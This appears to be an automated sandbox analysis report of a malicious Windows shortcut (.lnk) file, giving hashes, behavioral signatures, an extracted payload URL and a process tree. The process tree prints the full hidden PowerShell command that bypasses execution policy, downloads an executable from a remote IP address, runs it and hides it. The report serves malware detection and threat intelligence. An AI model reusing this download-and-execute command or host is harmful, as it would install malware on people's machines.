Analysis
-
max time kernel
12s -
max time network
20s -
platform
windows7_x64 -
resource
win7-20240704-en -
resource tags
arch:x64arch:x86image:win7-20240704-enlocale:en-usos:windows7-x64system -
submitted
27-07-2024 09:38
Static task
static1
Behavioral task
behavioral1
Sample
1e2f9bb7d4aee809ae89704f6225503bf72b09ca897986ab70a00332fdf10ae7.lnk
Resource
win7-20240704-en
General
-
Target
1e2f9bb7d4aee809ae89704f6225503bf72b09ca897986ab70a00332fdf10ae7.lnk
-
Size
2KB
-
MD5
4db66f511c6604f1be1ae032b84f8358
-
SHA1
8ab73293cf42ead05326874845622cea78822c8f
-
SHA256
1e2f9bb7d4aee809ae89704f6225503bf72b09ca897986ab70a00332fdf10ae7
-
SHA512
2cf294db093bbe00ce504d2817dced1d62d7eb8af4a7183836fb4af0288f7e5018cd2226bea522ad5464b911317bd184bb36303e766fa4a59239f87878510c67
Malware Config
Extracted
http://94.156.67.244:5679/abincontents/sthdytjdtuoigfyuqurbjzksbfgbshbfabirgtrht/ioihirabgbrdhbgwhkebgrsryftsevrfsyubkhabvyrgbksdtg/Display1.exe
Signatures
-
Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Run Powershell and hide display window.
pid Process 2916 PoWersheLl.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious behavior: EnumeratesProcesses 1 IoCs
pid Process 2916 PoWersheLl.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 2916 PoWersheLl.exe -
Suspicious use of WriteProcessMemory 3 IoCs
description pid Process procid_target PID 2160 wrote to memory of 2916 2160 cmd.exe 31 PID 2160 wrote to memory of 2916 2160 cmd.exe 31 PID 2160 wrote to memory of 2916 2160 cmd.exe 31
Processes
-
C:\Windows\system32\cmd.execmd /c C:\Users\Admin\AppData\Local\Temp\1e2f9bb7d4aee809ae89704f6225503bf72b09ca897986ab70a00332fdf10ae7.lnk1⤵
- Suspicious use of WriteProcessMemory
PID:2160 -
C:\Windows\System32\WindowsPowerShell\v1.0\PoWersheLl.exe"C:\Windows\System32\WindowsPowerShell\v1.0\PoWersheLl.exe" -ExecutionPolicy -Bypass -WindowStyle hiDdEn -hiDdEn -Command PkgMgr.exe;(new-object System.Net.WebClient).DownloadFile('http://94.156.67.244:5679/abincontents/sthdytjdtuoigfyuqurbjzksbfgbshbfabirgtrht/ioihirabgbrdhbgwhkebgrsryftsevrfsyubkhabvyrgbksdtg/Display1.exe','DisplayResolution.exe');./'DisplayResolution.exe';(get-item 'DisplayResolution.exe').Attributes += 'Hidden';2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2916
-